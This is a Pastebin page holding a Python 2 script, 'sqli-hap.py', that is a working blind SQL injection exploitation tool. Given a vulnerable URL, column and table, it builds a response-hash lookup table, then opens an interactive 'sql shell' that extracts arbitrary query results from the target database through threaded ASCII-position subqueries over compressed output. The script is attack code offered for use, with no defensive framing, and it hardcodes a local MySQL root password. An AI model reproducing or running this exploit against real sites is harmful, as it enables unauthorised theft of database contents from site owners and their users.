API tools faq
paste
Advertisement
opexxx

sqli-hap.py

opexxx
Sep 25th, 2013
167
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.12 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python2
  2. #!/usr/bin/python2
  3. import sys
  4. import urllib2
  5. import time
  6. from binascii import hexlify
  7. import _mysql
  8. import md5
  9. import pickle
  10. import re
  11. import os
  12. import threading
  13. import Queue
  14. import readline
  15. readline.parse_and_bind('tab: complete')
  16. readline.parse_and_bind('set editing-mode vi')
  17.  
  18. BOLD = '\033[1m'
  19. BLUE = '\033[34m'
  20. GREEN = '\033[32m'
  21. YELLOW = '\033[33m'
  22. RED = '\033[91m'
  23. ENDC = '\033[0m'
  24.  
  25. def request(request_url):
  26.   req = urllib2.Request(request_url)
  27.   req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko)' \
  28.                                   ' Chrome/24.0.1309.0 Safari/537.17')
  29.   r = urllib2.urlopen(req)
  30.   return r.read()
  31.  
  32. def construct_discovery_query(url, column, table, counter):
  33.   discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  34.   discovery =  discovery % (column, column, table, counter)
  35.   return url + urllib2.quote(discovery)
  36.  
  37. def construct_injection_query(url, column, table, query, position):
  38.   injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) " \
  39.               "x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  40.   injection = injection % (column, column, table, query, position)
  41.   return url + urllib2.quote(injection)
  42.  
  43. def get_length(url, column, table, query, ascii_table, counter):
  44.   injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) " \
  45.               "x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  46.   length_length = url + urllib2.quote(injection)
  47.   length_length = ascii_table[md5.new(request(length_length)).digest()]
  48.   counter += 1
  49.  
  50.   length = ""
  51.   for i in range(1,length_length+1):
  52.     injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) " \
  53.                 "x where pos=ascii(substring(length(compress((%s))) from %s for 1)))"
  54.     injection = injection % (column, column, table, query, i)
  55.     request_url = url + urllib2.quote(injection)
  56.     length += chr(ascii_table[md5.new(request(request_url)).digest()])
  57.     counter += 1
  58.  
  59.   return (int(length), counter)
  60.  
  61. def get_query(prompt):
  62.   while 1:
  63.     query = raw_input(prompt)
  64.     if query != "":
  65.       break
  66.   return query
  67.  
  68. def do_query(url, column, table, query, ascii_table, i, q):
  69.   tmp = construct_injection_query(url, column, table, query, i)
  70.   q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
  71.  
  72. def do_table(url, column, table, i, q):
  73.   tmp = construct_discovery_query(url, column, table, i)
  74.   q.put(md5.new(request(tmp)).digest())
  75.  
  76. def print_percent(percent, start_time):
  77.   elapsed_time = time.time() - start_time
  78.   eta = ((elapsed_time) / percent) * 100 - elapsed_time
  79.   sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s"
  80.                    % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  81.   sys.stdout.flush()
  82.  
  83. def do_thread(target, args, counter, length, type_query):
  84.   if type_query == 0:
  85.     ascii_table = {}
  86.   else:
  87.     query_result = ""
  88.  
  89.   if type_query == 0:
  90.     i = 0
  91.   else:
  92.     i = 1
  93.  
  94.  
  95.   sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  96.   sys.stdout.flush()
  97.   start_time = time.time()
  98.  
  99.   while i < length:
  100.     threads = {}
  101.     queues  = []
  102.  
  103.     for j in range(0,11):
  104.       if i < length:
  105.         queues.append(Queue.Queue())
  106.         threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
  107.         i += 1
  108.         counter += 1
  109.         print_percent(100 * float(i) / float(length), start_time)
  110.  
  111.     for thread in threads:
  112.       threads[thread].start()
  113.  
  114.     for j, thread in enumerate(sorted(threads.iterkeys())):
  115.       if type_query == 0:
  116.         ascii_table[queues[j].get()] = thread
  117.       else:
  118.         query_result += queues[j].get()
  119.       threads[thread].join()
  120.  
  121.   sys.stdout.write('\n')
  122.   sys.stdout.flush()
  123.  
  124.   if type_query == 0:
  125.     return ascii_table
  126.   else:
  127.     return (counter, query_result)
  128.  
  129. def main(url, column, table):
  130.   session_name = re.split("(https?://)?(.*)/", url)[2]
  131.  
  132.   print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  133.   try:
  134.     try:
  135.       os.stat("data")
  136.     except:
  137.       os.mkdir("data")
  138.     ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
  139.     print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  140.   except:
  141.     print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
  142.     current = time.time()
  143.     ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
  144.     pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
  145.     print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
  146.  
  147.   print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
  148.  
  149.   while 1:
  150.     query = get_query("%ssql shell>%s " % (BOLD, ENDC))
  151.     if query == "exit":
  152.       break
  153.  
  154.     query_result = ""
  155.     counter = 0
  156.     current = time.time()
  157.     (length, counter) = get_length(url, column, table, query, ascii_table, counter)
  158.  
  159.     (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
  160.  
  161.     query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
  162.     mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
  163.     mysql_connection.query(query)
  164.     result = mysql_connection.use_result()
  165.     data = result.fetch_row()[0][0]
  166.     mysql_connection.close()
  167.  
  168.     print data
  169.     print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s"
  170.           % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
  171.  
  172.   print "%s[*]%s Good bye" % (GREEN, ENDC)
  173.  
  174. if __name__=="__main__":
  175.   if len(sys.argv) != 4:
  176.     print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
  177.     exit()
  178.  
  179.   print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  180.   main(sys.argv[1], sys.argv[2], sys.argv[3])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!